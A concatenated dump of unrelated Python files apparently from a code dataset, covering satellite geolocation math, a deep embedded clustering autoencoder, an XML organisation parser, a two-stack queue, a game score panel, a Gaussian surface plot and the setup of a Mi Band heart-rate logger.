return')\n return\n \n \n # ;; The basic equations are:\n # ;;\n # ;; P + lambda LOS = G ( P = satellite position, LOS = line of sight, G = geolocation point).\n # ;; and lambda is the slant range.\n # ;;\n # ;; and\n # ;;\n # ;; Gx^2 / a^2 + Gy^2 / a^2 + Gz^2 / c^2 = 1 Earth ellipsoid equation, a = equatorial radius.\n # ;; c is polar radius ( c = ( 1-f) * a) where f is flattening factor.\n \n polarRadius = earthRadius * ( 1.0 - flatFact) ;\n \n # ;; The geolocation vector position is the solution of\n # ;; a quadratic equation where A lambda^2 + B lambda + C = 0, here lambda is the slant range.\n \n termA = (lineOfSight[:, 0] / earthRadius)**2 + \\\n (lineOfSight[:, 1] / earthRadius)**2 + \\\n (lineOfSight[:, 2] / polarRadius)**2\n\n termB = satellitePosition[:, 0]* lineOfSight[:, 0]/ (earthRadius**2) + \\\n satellitePosition[:, 1]* lineOfSight[:, 1]/ (earthRadius**2) + \\\n satellitePosition[:, 2]* lineOfSight[:, 2]/ (polarRadius**2) \n termB *= 2.0 \n\n termC = (satellitePosition[:, 0]/earthRadius)**2 + \\\n (satellitePosition[:, 1]/earthRadius)**2 + \\\n (satellitePosition[:, 2]/polarRadius)**2 - 1.0;\n\n radical = termB**2.0 - (4.0 * termA * termC)\n radical = radical.ravel()\n \n ## define the output variables\n geoLat = np.zeros(int(lineOfSight.size/3))\n geoLon = np.zeros(int(lineOfSight.size/3))\n geoAlt = np.zeros(int(lineOfSight.size/3))\n slantRange = np.zeros(int(lineOfSight.size/3))\n slantRange1 = np.zeros(int(lineOfSight.size/3))\n slantRange2 = np.zeros(int(lineOfSight.size/3))\n geolocationPoint = np.zeros_like(lineOfSight)\n \n # using proj to convert ECEF to LLA \n ecef = pyproj.Proj(proj='geocent', ellps='WGS84', datum='WGS84')\n lla = pyproj.Proj(proj='latlong', ellps='WGS84', datum='WGS84')\n \n # ;; The line of sight does not intercept the Earth ellipsoid.\n index, = np.where(radical <0) \n if index.size > 0: \n geoLat[index] = -9999.0\n geoLon[index] = -9999.0\n \n # ;; The line of sight intercepts the Earth ellipsoid tangentially.\n index, = np.where(radical == 0) \n if index.size > 0 : \n slantRange[index] = -termB[index] / (2.0 * termA[index]) ;\n geolocationPoint[index, :] = satellitePosition[index, :] + np.expand_dims(slantRange[index], axis=1) * lineOfSight[index,:]\n \n geoLon[index], geoLat[index], geoAlt[index] = pyproj.transform(ecef, lla, geolocationPoint[index, 0], \\\n geolocationPoint[index, 1], geolocationPoint[index, 2], radians=False)\n \n # ;; The line of sight intercepts the Earth ellipsoid at 2 points, the solution\n # ;; is the shorter slant range.\n index, = np.where(radical > 0) \n if index.size > 0 : \n \n slantRange1[index] = (-1.0*termB[index] - np.sqrt(radical[index])) / (2.0 * termA[index]);\n slantRange2[index] = (-1.0*termB[index] + np.sqrt(radical[index])) / (2.0 * termA[index]);\n \n #;;;; find the minimum value\n slantRange[index] = np.minimum(slantRange2[index], slantRange1[index])\n \n geolocationPoint[index, :] = satellitePosition[index, :] + np.expand_dims(slantRange[index], axis=1) * lineOfSight[index, :] \n \n geoLon[index], geoLat[index], geoAlt[index] = pyproj.transform(ecef, lla, geolocationPoint[index, 0], \\\n geolocationPoint[index, 1], geolocationPoint[index, 2], radians=False)\n\n index, = np.where(slantRange <= 0.0)\n if index.size > 0 : \n geoLat[index] = -9999.0\n geoLon[index] = -9999.0\n slantRange[index] =0.0\n \n if flag is None: \n return geoLon, geoLat, slantRange\n else: \n return geolocationPoint\n \n\n\ndef fov_shape (losVec, satVec, fovDia=0.963, degree=True): \n\n losVec = np.asarray(losVec, 
dtype=np.float64)\n satVec = np.asarray(satVec, dtype=np.float64)\n fovDia = np.asarray(fovDia, dtype=np.float64) \n\n if degree==True: \n fovDia = np.deg2rad(fovDia)\n \n if losVec.size % 3 !=0 or losVec.size != satVec.size: \n print(\"please check input ... vector size must be 3 times\")\n return \n \n if losVec.ndim == 1:\n losVec = np.expand_dims(losVec, axis=0)\n \n if satVec.ndim == 1:\n satVec = np.expand_dims(satVec, axis=0) \n \n \n nLos, nVec = losVec.shape\n \n curFovVector = np.zeros((37, nLos, nVec), dtype=np.float64)\n curSatVector = np.broadcast_to(satVec, (37, nLos, nVec))\n \n \n # step 1: cross product of LOS \n orthoVectorLOS = np.cross(losVec, np.array([[0,0,1]]))\n \n # Step 2: Rotatate the orthoVector to LOS by the FOV radius ( in radians).\n fovVector = rotate_vec(orthoVectorLOS, 0.5*fovDia, losVec, degree=False) \n \n \n for angle in np.arange(0,37):\n curFovVector[angle, :, :] = rotate_vec(losVec, angle*10, fovVector, degree=True)\n\n \n curFovLon, curFovLat, curRange = compute_geolocation(curSatVector.reshape(37*nLos,3), \\\n curFovVector.reshape(37*nLos,3))\n \n # using proj to convert ECEF to LLA \n curFovLon = curFovLon.reshape(37, nLos)\n curFovLat = curFovLat.reshape(37, nLos)\n \n \n return curFovLon, curFovLat\n \n###########################################################################\n \ndef interpolate_sat_vector(sat_p, sat_v, sat_att, sat_time, out_time): \n \n ts = sat_time.size\n os = out_time.size\n vs = 3\n \n p_out = np.zeros((os, vs), dtype=np.float64)\n v_out = np.zeros((os, vs), dtype=np.float64)\n att_out = np.zeros((os, vs), dtype=np.float64)\n \n idx = np.where(sat_time > TIME2IET(datetime(2012, 1, 1)))\n \n for i in range(0, vs): \n \n p_out[:, i] = np.interp(out_time, sat_time[idx], sat_p[idx, i].ravel())\n v_out[:, i] = np.interp(out_time, sat_time[idx], sat_v[idx, i].ravel())\n att_out[:, i] = np.interp(out_time, sat_time[idx], sat_att[idx, i].ravel())\n \n return p_out, v_out, att_out\n \n \n \n \n \n \n\n","sub_path":"geolocation.py","file_name":"geolocation.py","file_ext":"py","file_size_in_byte":47345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"520326968","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nimport torch.optim as optim\n#import matplotlib.pyplot as plt\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom sklearn.metrics.cluster import normalized_mutual_info_score\nfrom scipy.optimize import linear_sum_assignment\nimport argparse\n\npar = argparse.ArgumentParser()\npar.add_argument(\"-d\", \"--data_path\", required=True,\n type=str, help=\"Please enter data path\")\npar.add_argument(\"-f\", \"--num_features\", default=64, choices=[64, 256],\n type=int, help=\"Set the feature size. (64/256)\")\npar.add_argument(\"-t\", \"--types\", default=\"semantic\", choices=[\"real\", \"semantic\"],\n type=str, help=\"Choose a data type. 
(real/semantic)\")\npar.add_argument(\"-e\", \"--number_of_epochs\", default=100,\n type=int, help=\"number of epochs\")\npar.add_argument(\"-c\", \"--number_of_classes\", default=18,\n type=int, help=\"number of classes\")\nargs = par.parse_args()\n\n## Set the parameters and data path\ndata_path = args.data_path + \"/\"\nnum_features = args.num_features\ntypes = args.types\nnum_epochs = args.number_of_epochs\nnum_classes = args.number_of_classes\nlearning_rate = 0.001\nbatch_size = 128\n\n## Set each path (num_features is an int, so cast it to str when building paths)\nlog_path = \"log/pth/best_loss_\" + types + \"_conv_autoencoder_d\" + str(num_features) + \"_save_model.pth\"\ndata_path = data_path + (\"activity\" if types == \"real\" else types)\ndata_all_path = data_path + \"/image/all\"\ndata_train_path = data_path + \"/image/train\"\ndata_test_path = data_path + \"/image/test\"\n\nif not os.path.exists(\"./log/\"):\n os.mkdir(\"./log/\")\nif not os.path.exists(\"./log/pth/\"):\n os.mkdir(\"./log/pth/\")\nsave_log_path = \"./log/check_point/\"\nsave_img_path = \"./log/img/\"\nif not os.path.exists(save_log_path):\n os.mkdir(save_log_path)\nif not os.path.exists(save_img_path):\n os.mkdir(save_img_path)\nsave_log_path = save_log_path + (\"re\" if types == \"real\" else \"se\") + \"_d\" + str(num_features)\nsave_img_path = save_img_path + (\"re\" if types == \"real\" else \"se\") + \"_d\" + str(num_features)\nif not os.path.exists(save_log_path):\n os.mkdir(save_log_path)\nif not os.path.exists(save_img_path):\n os.mkdir(save_img_path)\n\n## Set data loader\ndataset = datasets.ImageFolder(root=data_all_path,\n transform=transforms.Compose([\n transforms.Resize((256,128)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5)),\n ]))\ndataloader = torch.utils.data.DataLoader(dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=8)\n\ntrain_dataset = datasets.ImageFolder(root=data_train_path,\n transform=transforms.Compose([\n transforms.Resize((256,128)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5)),\n ]))\ntrain_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=8)\n\ntest_dataset = datasets.ImageFolder(root=data_test_path,\n transform=transforms.Compose([\n transforms.Resize((256,128)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5)),\n ]))\ntest_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=8)\n\n## Accuracy\nnmi = normalized_mutual_info_score\ndef acc(y_true, y_pred):\n y_true = y_true.astype(np.int64)\n assert y_pred.size == y_true.size\n D = max(y_pred.max(), y_true.max()) + 1\n w = np.zeros((D, D), dtype=np.int64)\n for i in range(y_pred.size):\n w[y_pred[i], y_true[i]] += 1\n ind = linear_sum_assignment(w.max() - w)\n ind = np.asarray(ind)\n ind = np.transpose(ind)\n return sum([w[i, j] for i, j in ind]) * 1.0 / y_pred.size\n\n## Convolutional autoencoder\nclass AutoEncoderConv(nn.Module):\n def __init__(self, num_classes, num_features):\n super(AutoEncoderConv, self).__init__()\n self.num_features = num_features\n self.fc1 = nn.Linear(64*8*4, 2048)\n self.fc2 = nn.Linear(2048, 256)\n if self.num_features == 64:\n self.fc3 = nn.Linear(256, 64)\n self.de_fc1 = nn.Linear(64, 256)\n self.de_fc2 = nn.Linear(256, 2048)\n self.de_fc3 = nn.Linear(2048, 64*8*4)\n\n self.encoder = nn.Sequential(\n # Input : 3*256*128\n nn.Conv2d(3, 8, 3, padding=1),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n # 8*128*64\n\n nn.Conv2d(8, 16, 3, padding=1),\n 
nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n # 16*64*32\n\n nn.Conv2d(16, 16, 3, padding=1),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n # 16*32*16\n\n nn.Conv2d(16, 32, 3, padding=1),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n # 32*16*8\n\n nn.Conv2d(32, 64, 3, padding=1),\n nn.ReLU(True),\n nn.MaxPool2d(2, 2),\n # 64*8*4\n )\n\n self.decoder = nn.Sequential(\n # 64*8*4\n\n nn.ConvTranspose2d(64, 32, 2, stride=2),\n nn.ReLU(True),\n # 32*16*8\n\n nn.ConvTranspose2d(32, 16, 2, stride=2),\n nn.ReLU(True),\n # 16*32*16\n\n nn.ConvTranspose2d(16, 16, 2, stride=2),\n nn.ReLU(True),\n # 16*64*32\n\n nn.ConvTranspose2d(16, 8, 2, stride=2),\n nn.ReLU(True),\n # 8*128*64\n\n nn.ConvTranspose2d(8, 3, 2, stride=2),\n nn.ReLU(True)\n # 3*256*128\n )\n\n self.alpha = 1.0\n self.clusterCenter = nn.Parameter(torch.zeros(num_classes,num_features))\n self.pretrainMode = True\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n torch.nn.init.xavier_uniform(m.weight)\n\n def setPretrain(self,mode):\n self.pretrainMode = mode\n\n def updateClusterCenter(self, cc):\n self.clusterCenter.data = torch.from_numpy(cc)\n\n def getTDistribution(self, x, clusterCenter):\n xe = torch.unsqueeze(x,1).cuda() - clusterCenter.cuda()\n q = 1.0 / (1.0 + (torch.sum(torch.mul(xe,xe), 2) / self.alpha))\n q = q ** (self.alpha + 1.0) / 2.0\n q = (q.t() / torch.sum(q, 1)).t() #due to divison, we need to transpose q\n return q\n\n def forward(self, x):\n # -- encoder --\n y = self.encoder(x)\n y = F.relu(self.fc1(y.view(y.size(0), -1)))\n y = F.relu(self.fc2(y))\n if self.num_features == 64:\n y = F.relu(self.fc3(y))\n y_e = y\n\n # if not in pretrain mode, we only need encoder\n if self.pretrainMode == False:\n return y, self.getTDistribution(y, self.clusterCenter)\n\n # -- decoder --\n if self.num_features == 64:\n y = F.relu(self.de_fc1(y))\n y = F.relu(self.de_fc2(y))\n y = F.relu(self.de_fc3(y))\n y_d = self.decoder(y.view(y.size(0), 64, 8, 4))\n return y_e, y_d\n\n## Controlling the training process of DEC\nclass DEC:\n def __init__(self,n_clusters,n_features, alpha=1.0):\n self.n_clusters = n_clusters\n self.n_features = n_features\n self.alpha = alpha\n \n @staticmethod\n def target_distribution(q):\n weight = q ** 2 / q.sum(0)\n return Variable((weight.t() / weight.sum(1)).t().data, requires_grad=True)\n def logAccuracy(self,pred,label):\n print(' '*8 + '|==> acc: %.4f, nmi: %.4f <==|'\n % (acc(label, pred), nmi(label, pred)))\n @staticmethod\n def kld(q,p):\n res = torch.sum(p*torch.log(p/q),dim=-1)\n return res\n \n def validateOnCompleteTestData(self,test_loader,model):\n model.eval()\n for i,d in enumerate(test_loader):\n if i == 0:\n to_eval = model(d[0].cuda())[0].data.cpu().numpy()\n true_labels = d[1].cpu().numpy()\n else:\n to_eval = np.concatenate((to_eval, model(d[0].cuda())[0].data.cpu().numpy()), axis=0)\n true_labels = np.concatenate((true_labels, d[1].cpu().numpy()), axis=0)\n\n #print(\"to_eval.shape : {}\".format(to_eval.shape))\n #print(\"true_labels.shape : {}\".format(true_labels.shape))\n #print(\"len(np.unique(true_labels) is {}\".format(len(np.unique(true_labels))))\n \n km = KMeans(n_clusters=len(np.unique(true_labels)))\n y_pred = km.fit_predict(to_eval)\n \n return acc(true_labels, y_pred), nmi(true_labels, y_pred)\n \n def pretrain(self, dataloader, num_epochs):\n model = AutoEncoderConv(self.n_clusters, self.n_features).cuda()\n criterion = nn.MSELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n best_loss = 1.0\n best_epoch = 0\n\n for epoch in 
range(num_epochs):\n for data in tqdm(dataloader):\n img, _ = data\n img = Variable(img).cuda()\n # ===================forward=====================\n _, output = model(img)\n loss = criterion(output, img)\n # ===================backward====================\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n # ===================log========================\n if epoch % 2 == 0:\n save_image(img, save_img_path + \"image_{}.png\".format(epoch))\n save_image(output, save_img_path + \"g_image_{}.png\".format(epoch))\n\n if loss.item() < best_loss:\n best_loss = loss.item()\n best_epoch = epoch+1\n torch.save(model.state_dict(), \"./log/pth/best_loss_\"\n + types + \"_conv_autoencoder_d\" + num_features + \"_save_model.pth\")\n\n print(\"epoch [{}/{}], loss:{:.4f}, best loss:{:.4f}[{}/{}]\"\n .format(epoch+1, num_epochs, loss.item(), best_loss, best_epoch, num_epochs))\n with open(save_log_path + \"epoch\" + str(epoch+1), 'w') as f:\n f.write(\"epoch [{}/{}], loss:{:.4f}, best loss:{:.4f}[{}/{}]\"\n .format(epoch+1, num_epochs, loss.item(), best_loss, best_epoch, num_epochs))\n torch.save(model.state_dict(), \"./log/pth/\"\n + types + \"_conv_autoencoder_d\" + num_features + \"_save_model.pth\")\n\n torch.save(model.state_dict(), \"./log/pth/\"\n + types + \"_conv_autoencoder_d\" + num_features + \"_save_model.pth\")\n \n def clustering(self, mbk, x, model):\n model.eval()\n y_pred_ae,_ = model(x)\n y_pred_ae = y_pred_ae.data.cpu().numpy()\n y_pred = mbk.partial_fit(y_pred_ae) # seems we can only get a centre from batch\n self.cluster_centers = mbk.cluster_centers_ # keep the cluster centers\n model.updateClusterCenter(self.cluster_centers)\n def train(self,train_loader, test_loader, num_epochs):\n # this method will start training for DEC cluster\n best_epoch = 0\n best_nmi = 0.0\n model = AutoEncoderConv(self.n_clusters, self.n_features).cuda()\n model.load_state_dict(torch.load(log_path))\n model.setPretrain(False)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n print('Initializing cluster center with pre-trained weights')\n mbk = MiniBatchKMeans(n_clusters=self.n_clusters, batch_size=batch_size)\n got_cluster_center = False\n for epoch in range(num_epochs):\n for data in tqdm(train_loader):\n img, _ = data\n img = Variable(img).cuda()\n optimizer.zero_grad()\n # step 1 - get cluster center from batch\n # here we are using minibatch kmeans to be able to cope with larger dataset.\n if not got_cluster_center:\n self.clustering(mbk, img, model)\n if epoch > 1:\n got_cluster_center = True\n else:\n model.train()\n # now we start training with acquired cluster center\n feature_pred,q = model(img)\n # get target distribution\n p = self.target_distribution(q)\n kld_loss = self.kld(q,p).mean()\n kld_loss.backward()\n optimizer.step()\n \n if got_cluster_center:\n acc, nmi = self.validateOnCompleteTestData(test_loader,model)\n if best_nmi < nmi:\n best_epoch = epoch+1\n best_nmi = nmi\n torch.save(model.state_dict(), \"./log/pth/best_nmi_\"\n + types + \"_dec_conv_d\" + num_features + \"_save_model.pth\")\n\n print('epoch [{}/{}], loss:{:.4f}, acc:{:.4f}, nmi:{:.4f}, *best_nmi:{:.4f}[{}/{}]'\n .format(epoch+1, num_epochs, kld_loss.item(), acc, nmi, best_nmi, best_epoch, num_epochs))\n with open(save_log_path + \"dec_epoch\" + str(epoch+1), 'w') as f:\n f.write(\"epoch [{}/{}], loss:{:.4f}, acc:{:.4f}, nmi:{:.4f}, *best_nmi:{:.4f}[{}/{}]\"\n .format(epoch+1, num_epochs, kld_loss.item(), acc, nmi, best_nmi, best_epoch, num_epochs))\n torch.save(model.state_dict(), 
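A second note on the same record: `target_distribution` wraps the sharpened target in `Variable(..., requires_grad=True)`, but in DEC the target p is held constant during each optimisation step — gradients should not flow through it — and `Variable` has been folded into plain tensors since PyTorch 0.4. A hedged restatement of the target and the KL objective, cross-checked against `kl_div`:

```python
import torch

def target_distribution(q):
    """Sharpened DEC target: p_ij ∝ q_ij^2 / f_j, with f_j = sum_i q_ij."""
    weight = q ** 2 / q.sum(dim=0)
    p = weight / weight.sum(dim=1, keepdim=True)
    return p.detach()  # treat the target as a constant

def kl_loss(q, p, eps=1e-10):
    # KL(p || q) averaged over the batch; eps guards against log(0).
    return torch.sum(p * torch.log((p + eps) / (q + eps)), dim=1).mean()

q = torch.softmax(torch.randn(8, 3), dim=1)
p = target_distribution(q)
loss = kl_loss(q, p)
check = torch.nn.functional.kl_div(q.log(), p, reduction="batchmean")
assert torch.allclose(loss, check, atol=1e-5)
```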
\"./log/pth/\"\n + types + \"_dec_conv_d\" + num_features + \"_save_model.pth\")\n\nif __name__ == \"__main__\":\n dec = DEC(num_classes, num_features)\n dec.pretrain(dataloader, num_epochs)\n dec.train(train_loader, test_loader, num_epochs)\n","sub_path":"autoencoder/deep_embedding_clustering/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"206753506","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport xml.etree.ElementTree as ET\n\nimport re\nfrom flask import current_app\n\n\ndef get_organisations_from_nif_idrettsraad_xml(xml_file_path):\n \"\"\"\n Parse given XML with organisations with organisation name, number and member counts.\n Returns a list of dictionaries to the same format\n as accepted by flod_organisation.\n @param xml_file_path\tProvide the file path to the XML file to be parsed\n @return list\t\tOrganisation dictionaries\n \"\"\"\n try:\n namespaces = {'xmlns': u'Orgoversikt_x0020_idrettsråd'}\n\n tree = ET.parse(xml_file_path)\n root = tree.getroot()\n\n organisation_elements = root.findall(\"xmlns:table1/xmlns:Detail_Collection/xmlns:Detail\",\n namespaces=namespaces)\n\n organisations = []\n for child in organisation_elements:\n organisation = {}\n\n try:\n organisation['name'] = child.attrib['DescribingName']\n\n try:\n organisation['org_number'] = int(child.attrib['organisationnumber'])\n except ValueError:\n # If normal parsing fails, we try to be clever\n current_app.logger.warn(\"Parsefeil for \" + str(child.attrib['organisationnumber']) + \". Forsøker igjen.\")\n organisation['org_number'] = parse_number_with_incorrect_format(child.attrib['organisationnumber'])\n current_app.logger.warn(\"Organisasjonsnummeret \" + str(child.attrib['organisationnumber']) + \" ble parset til \" + str(organisation['org_number']))\n\n organisation['num_members'] = int(child.attrib['AntMemb'])\n organisation['num_members_b20'] = int(child.attrib['AntMemb20'])\n organisations.append(organisation)\n\n except Exception as e:\n current_app.logger.error(\"Parsing av medlemsdata feilet for: \" + str(ET.dump(child)) + \" Feil: \" + str(e))\n\n return organisations\n\n except Exception as e:\n current_app.logger.error(\"Parsing av medlemsdata feilet: \" + str(e))\n return []\n\n\ndef parse_number_with_incorrect_format(my_string):\n '''\n If we have a string that should be parsed as a number, it may have been written with illegal string characters.\n We attempt to remove non-digit characters to form a number of the digit characters.\n This may very well throw an exception if it turns out that it is not parseable to an integer\n E.g. 
NO987342432MVA, 987 342 432 will be parsed to 987342432\n '''\n\n number_matches = re.findall(r\"(\\d+)\\D*\", my_string)\n number_string = ''.join(number_matches)\n return int(number_string)\n","sub_path":"flod_aktor_frontend/flod_aktor_frontend/xmlParser.py","file_name":"xmlParser.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"53917285","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 26 12:58:32 2018\r\n\r\n@author: swats\r\n\"\"\"\r\n\r\nclass Queue():\r\n def __init__(self):\r\n self.stack1=[]\r\n self.stack2=[]\r\n \r\n def push(self,item):\r\n self.stack1.append(item)\r\n \r\n def display(self):\r\n if self.stack1!=[] and self.stack2==[]:\r\n return self.stack1\r\n return self.stack2\r\n \r\n def pop(self):\r\n if self.stack1==[]:\r\n return 'No element in queue'\r\n else:\r\n while self.stack1 !=[]:\r\n self.stack2.append(self.stack1.pop())\r\n \r\n return self.stack2.pop()\r\n \r\n def search(self,x):\r\n while self.stack1!=[] or self.stack2!=[]:\r\n if x in self.stack1 or x in self.stack2:\r\n \r\n return {self.stack2.index(x)}\r\n else:\r\n return 'element not found'\r\n \r\n \r\n \r\nq=Queue()\r\nq.push(1)\r\nq.push(2)\r\nq.push(3)\r\nq.push(4)\r\nq.push(5)\r\nprint(q.display())\r\nprint(q.pop())\r\nprint(q.search(3))\r\nprint(q.display()) ","sub_path":"Queue.py","file_name":"Queue.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"153712795","text":"from Utils.ViewPluginBase import ViewPluginBase\nfrom Utils.gui.FontProvider import FontProvider\nfrom Utils.ServiceLocator import ServiceLocator, ServiceNames\nfrom Utils.GameState import GameState\n\nclass DefaultScorePanel(ViewPluginBase):\n \"\"\"Plugin to draw the ScorePanel.\"\"\"\n def __init__(self):\n super().__init__()\n self._screenRect = self._screen.get_rect()\n self._fontColor = (0,0,0)\n self._status = ServiceLocator.getGlobalServiceInstance(ServiceNames.Gamestate)\n assert isinstance(self._status, GameState)\n\n\n def drawTextLabel(self, x, y, text, font=FontProvider.defaultFont(), color=(0,0,0)):\n label = font.render(text, 1, color)\n textPos = label.get_rect()\n textPos.left = x\n textPos.top = y\n self._screen.blit(label, textPos)\n return textPos\n\n def drawPlugin(self):\n pos = self.drawTextLabel(10, 10, \"Points: {0}\".format(self._status.points))\n pos = self.drawTextLabel(10, pos.bottom + 8, \"Energy: {0}\".format(self._status.energy))\n pos = self.drawTextLabel(10, pos.bottom + 8, \"Lifes: {0}\".format(self._status.lifes))\n\n pos = self.drawTextLabel(9, 9, \"Points: {0}\".format(self._status.points), color = (255,255,255))\n pos = self.drawTextLabel(9, pos.bottom + 8, \"Energy: {0}\".format(self._status.energy), color = (255,255,255))\n pos = self.drawTextLabel(9, pos.bottom + 8, \"Lifes: {0}\".format(self._status.lifes), color = (255,255,255))\n #return super().drawPlugin()\n","sub_path":"SimpleGame/SimpleGame/Src/Plugins/DefaultScorePanel.py","file_name":"DefaultScorePanel.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"374214758","text":"__author__ = 'zackory'\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nmu = np.array([40, 60])\nsigma = 
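On the Queue.py record above: it builds a FIFO queue from two stacks, but `pop` drains `stack1` into `stack2` on every call (so interleaved push/pop reorders elements — push 1, 2; pop; push 3; pop returns 3, not 2), `display` goes stale once anything has migrated, and `search` returns a one-element set of an index in the wrong stack. The textbook version refills the output stack only when it is empty, which makes every operation amortised O(1):

```python
class Queue:
    """FIFO queue built from two LIFO stacks (amortised O(1) per operation)."""

    def __init__(self):
        self.inbox = []   # receives pushes
        self.outbox = []  # serves pops in FIFO order

    def push(self, item):
        self.inbox.append(item)

    def pop(self):
        if not self.outbox:
            # Refill only when empty, so each element moves at most once.
            while self.inbox:
                self.outbox.append(self.inbox.pop())
        if not self.outbox:
            raise IndexError("pop from empty queue")
        return self.outbox.pop()

    def __contains__(self, item):
        return item in self.inbox or item in self.outbox

    def __iter__(self):
        yield from reversed(self.outbox)  # front of the queue first
        yield from self.inbox

q = Queue()
for n in (1, 2, 3, 4, 5):
    q.push(n)
assert q.pop() == 1 and q.pop() == 2
assert 3 in q and list(q) == [3, 4, 5]
```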
np.array([[100, 30], [30, 140]])\n\nsigmaInv = np.linalg.inv(sigma)\n# coeff = 1 / (2*np.pi*np.sqrt(np.linalg.det(sigma)))\ncoeff = 1\n\np = [[np.exp(-0.5*np.dot(np.dot(([i,j]-mu).T, sigmaInv), ([i,j]-mu))) for j in xrange(100)] for i in xrange(100)]\np = np.array(p)*coeff\n\n\nfig = plt.figure()\nax = fig.gca(projection='3d')\nX = np.arange(0, 100, 1)\nY = np.arange(0, 100, 1)\nX, Y = np.meshgrid(X, Y)\n# cmap = cm.Blues\ncmap = cm.cool\n# cmap = cm.winter\n# surf = ax.plot_surface(X, Y, p, rstride=1, cstride=1, cmap=cmap, linewidth=0, antialiased=False)\nsurf = ax.plot_surface(X, Y, p, rstride=2, cstride=2, cmap=cmap, alpha=0.4, linewidth=0, antialiased=False, edgecolors='#52b4f8')\n# ax.set_zlim(-1.01, 1.01)\n\nx = np.array([60, 30])\nax.plot([60, x[0]], [0, x[1]], alpha=0.8, c='k', linewidth=2)\nax.plot([100, x[0]], [30, x[1]], alpha=0.8, c='k', linewidth=2)\n# Plot line between points\nax.plot([x[0], x[0]], [x[1], x[1]], zs=[0, p[x[1], x[0]]], alpha=0.8, c='k', linewidth=2)\n\n# Plot point on 2D grid\nax.plot([x[0]], [x[1]], 'r.', alpha=0.7, markersize=20)\n# Plot point on gaussian distribution\nax.plot([x[0]], [x[1]], 'g.', zs=[p[x[1], x[0]]], alpha=1, markersize=20)\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\n# ax.zaxis.set_major_locator(LinearLocator(10))\n# ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\nfig.colorbar(surf, shrink=0.5, aspect=5)\n\nplt.show()\n","sub_path":"hrl_multimodal_anomaly_detection/scripts/multivariateGaussian.py","file_name":"multivariateGaussian.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"370312593","text":"import argparse\nimport subprocess\nimport time\nimport signal\nimport csv\nimport math\nimport socket\nfrom datetime import datetime\nfrom _thread import *\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.animation import FuncAnimation\nimport psutil\nimport collections\n\nfrom bluepy.btle import BTLEDisconnectError\n\nfrom constants import MUSICSTATE\nfrom miband import miband\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-m', '--mac', required=False, help='Set mac address of the device')\nparser.add_argument('-k', '--authkey', required=False, help='Set Auth Key for the device')\nparser.add_argument('-f', '--file', required=True, help='Set the output path to save heart rate data')\nparser.add_argument('-a', '--host', required=False, default='127.0.0.1', help='Set the host address to connect')\nparser.add_argument('-p', '--port', required=True, help='Set the port to connect to')\nargs = parser.parse_args()\n\n# Try to obtain MAC from the file\ntry:\n with open(\"mac.txt\", \"r\") as f:\n mac_from_file = f.read().strip()\nexcept FileNotFoundError:\n mac_from_file = None\n\n# Use appropriate MAC\nif args.mac:\n MAC_ADDR = args.mac\nelif mac_from_file:\n MAC_ADDR = mac_from_file\nelse:\n print(\"Error:\")\n print(\" Please specify MAC address of the MiBand\")\n print(\" Pass the --mac option with MAC address or put your MAC to 'mac.txt' file\")\n print(\" Example of the MAC: a1:c2:3d:4e:f5:6a\")\n exit(1)\n\n# Validate MAC address\nif 1 < len(MAC_ADDR) != 17:\n print(\"Error:\")\n print(\" Your MAC length is not 17, please check the format\")\n print(\" Example of the MAC: a1:c2:3d:4e:f5:6a\")\n exit(1)\n\n# Try to obtain Auth Key from file\ntry:\n with open(\"auth_key.txt\", \"r\") as f:\n auth_key_from_file = f.read().strip()\nexcept FileNotFoundError:\n auth_key_from_file = None\n\n# Use appropriate 
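On the multivariateGaussian.py record above: it evaluates the bivariate normal with a Python 2 `xrange` double loop and deliberately drops the normalising constant (`coeff = 1`, with the true `1/(2π√|Σ|)` commented out), so the plotted surface peaks at 1 rather than integrating to 1. A vectorised, normalised equivalent over the same 100×100 grid (assuming SciPy is available):

```python
import numpy as np
from scipy.stats import multivariate_normal

mu = np.array([40, 60])
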